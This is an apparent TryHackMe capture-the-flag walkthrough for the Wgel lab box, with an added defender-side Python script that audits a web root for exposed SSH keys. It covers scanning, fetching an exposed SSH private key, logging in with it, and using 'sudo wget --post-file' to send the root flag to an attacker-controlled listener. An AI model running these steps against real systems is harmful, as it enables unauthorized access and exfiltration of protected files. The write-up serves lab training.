TryHackMe: Wgel CTF

ratiros01
3 min read, Jul 1, 2020

1. Port scan
nmap -Pn <ip>

2. OS and Services scan

nmap -A -p 22,80 <ip>

3. Access the HTTP site and view the page source

There's a message in the page source. It seems to contain a username, which is jessie or Jessie.

4. Scan with gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html

There's a sitemap directory.

Accessing /sitemap shows nothing much.

5. Scan sitemap with gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/sitemap/ -x php,txt,html

Nothing much, because I already accessed these pages.

6. Scan sitemap with gobuster using another wordlist

gobuster dir --wordlist /usr/share/dirb/wordlists/common.txt -u http://<ip>/ -x php,txt,html

7. Now I found the private key for the SSH service

8. Download it

wget http://<ip>/sitemap/.ssh/id_rsa

9. Change permission

chmod 600 id_rsa

10. Login with SSH

ssh -i id_rsa jessie@<ip>
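As an added defender-side check, not part of the original writeup: a small audit script that walks a web document root and flags SSH key material the web server would serve, like the sitemap/.ssh/id_rsa found above. The directory layout it audits is constructed inline and the "key" is a placeholder header only.

```python
"""Audit a web document root for SSH key material the server would serve."""
import os
import re
import tempfile
from pathlib import Path

# PEM header used by OpenSSH, PKCS#1 and PKCS#8 private keys.
KEY_HEADER = re.compile(rb"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----")
KEY_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519", "authorized_keys"}


def audit_webroot(root):
    """Return sorted (relative_path, reasons) pairs for files that look like SSH material."""
    root = Path(root)
    findings = []
    # os.walk is used so dot-directories such as .ssh are not skipped.
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            rel = path.relative_to(root)
            reasons = []
            if ".ssh" in rel.parts:
                reasons.append("inside a .ssh directory")
            if name in KEY_NAMES:
                reasons.append("ssh key file name")
            try:
                with path.open("rb") as fh:
                    head = fh.read(64)  # only the header is inspected
            except OSError:
                head = b""
            if KEY_HEADER.match(head):
                reasons.append("PEM private key header")
            if reasons:
                findings.append((rel.as_posix(), "; ".join(reasons)))
    return sorted(findings)


def demo():
    """Build a constructed web root shaped like the box's and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        ssh = root / "sitemap" / ".ssh"
        ssh.mkdir(parents=True)
        # Constructed placeholder, not a real key.
        (ssh / "id_rsa").write_bytes(b"-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER\n-----END RSA PRIVATE KEY-----\n")
        (root / "backup.key").write_bytes(b"-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n")
        return audit_webroot(root)


if __name__ == "__main__":
    for rel, why in demo():
        print(f"{rel}: {why}")
```

Run it against the real document root (for example /var/www/html) on a box you administer; any hit is a file to remove from the web root and a key to rotate.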

11. Explore /home/jessie

ls
cd Desktop
ls
cd ..
cd Documents
ls
cat user_flag.txt

12. Check if jessie can use sudo

sudo -l

There's wget. I can use it to send the root flag to my machine.

13. Create listener for root flag file

nc -lvp 80 > root.txt

14. Send file

sudo wget --post-file=/root/root_flag.txt <attacker ip>

15. Read root flag file

ls
cat root_flag.txt
